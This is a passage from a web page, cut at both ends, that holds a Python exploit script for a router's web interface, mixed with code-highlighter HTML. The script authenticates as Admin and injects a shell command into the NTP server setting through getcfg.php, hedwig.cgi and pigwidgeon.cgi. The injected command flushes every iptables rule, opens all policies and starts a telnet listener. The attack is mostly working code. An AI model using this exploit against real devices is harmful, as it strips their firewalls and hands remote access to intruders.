print(resp.text)      sys.exit()    print(&#8220;uid:&#8221;, resp[&#8220;uid&#8221;])  print(&#8220;challenge:&#8221;, resp[&#8220;challenge&#8221;])    session.cookies.update({&#8220;uid&#8221;: resp[&#8220;uid&#8221;]})    print(&#8220;Auth login&#8230;&#8221;)  user_name = &#8220;Admin&#8221;  user_pasw = admin_pasw    data = {      &#8220;id&#8221;: user_name,      &#8220;password&#8221;: hmac.new(user_pasw.encode(), (user_name + resp[&#8220;challenge&#8221;]).encode(), &#8220;md5&#8221;).hexdigest().upper()  }  resp = session.post(urljoin(TARGET, &#8220;\/authentication.cgi&#8221;), data=data)  # print(resp.text)    resp = json.loads(resp.text)  if resp[&#8220;status&#8221;].lower() != &#8220;ok&#8221;:      print(&#8220;Failed!&#8221;)      print(resp.text)      sys.exit()  print(&#8220;OK&#8221;)    ############################################################    data = {&#8220;SERVICES&#8221;: &#8220;DEVICE.TIME&#8221;}  resp = session.post(urljoin(TARGET, &#8220;\/getcfg.php&#8221;), data=data)  # print(resp.text)    tree = lxml.etree.fromstring(resp.content)  tree.xpath(&#8220;\/\/ntp\/enable&#8221;)[0].text = &#8220;1&#8221;  tree.xpath(&#8220;\/\/ntp\/server&#8221;)[0].text = &#8220;metelesku; (&#8221; + COMMAND + &#8220;) &amp; exit; &#8221;  tree.xpath(&#8220;\/\/ntp6\/enable&#8221;)[0].text = &#8220;1&#8221;    ############################################################    print(&#8220;hedwig&#8221;)    headers = {&#8220;Content-Type&#8221;: &#8220;text\/xml&#8221;}  data = lxml.etree.tostring(tree)  resp = session.post(urljoin(TARGET, &#8220;\/hedwig.cgi&#8221;), headers=headers, data=data)  # print(resp.text)    tree = lxml.etree.fromstring(resp.content)  result = tree.findtext(&#8220;result&#8221;)  if result.lower() != &#8220;ok&#8221;:      print(&#8220;Failed!&#8221;)      print(resp.text)      sys.exit()  print(&#8220;OK&#8221;)    ############################################################    print(&#8220;pigwidgeon&#8221;)    data = {&#8220;ACTIONS&#8221;: &#8220;SETCFG,ACTIVATE&#8221;}  resp = session.post(urljoin(TARGET, &#8220;\/pigwidgeon.cgi&#8221;), data=data)  # print(resp.text)    tree = lxml.etree.fromstring(resp.content)  result = tree.findtext(&#8220;result&#8221;)  if result.lower() != &#8220;ok&#8221;:      print(&#8220;Failed!&#8221;)      print(resp.text)      sys.exit()  print(&#8220;OK&#8221;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac95e008713212-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac95e008713212-150\">150<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-2\"><span class=\"crayon-p\"># pylint: disable=C0103<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-3\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-4\"><span class=\"crayon-p\"># pip3 install requests lxml<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-5\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">hmac<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">json<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-9\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urljoin<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-10\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">saxutils <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">escape<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-11\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">etree<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-12\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-14\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">disable_warnings<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">exceptions<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">InsecureRequestWarning<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-16\"><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-19\"><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-20\"><span class=\"crayon-v\">COMMAND<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;;&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -F&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -X&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -t nat -F&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -t nat -X&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -t mangle -F&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -t mangle -X&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -P INPUT ACCEPT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -P FORWARD ACCEPT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -P OUTPUT ACCEPT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;telnetd -p 23090 -l \/bin\/date&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># port &#8216;Z2&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-33\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-34\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">verify<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-36\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-38\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Get password&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-40\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;Content-Type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;text\/xml&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-41\"><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;uid&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;whatever&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-42\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;?<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-i\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">encoding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;utf-8&#8221;<\/span><span class=\"crayon-ta\">?&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-43\"><span 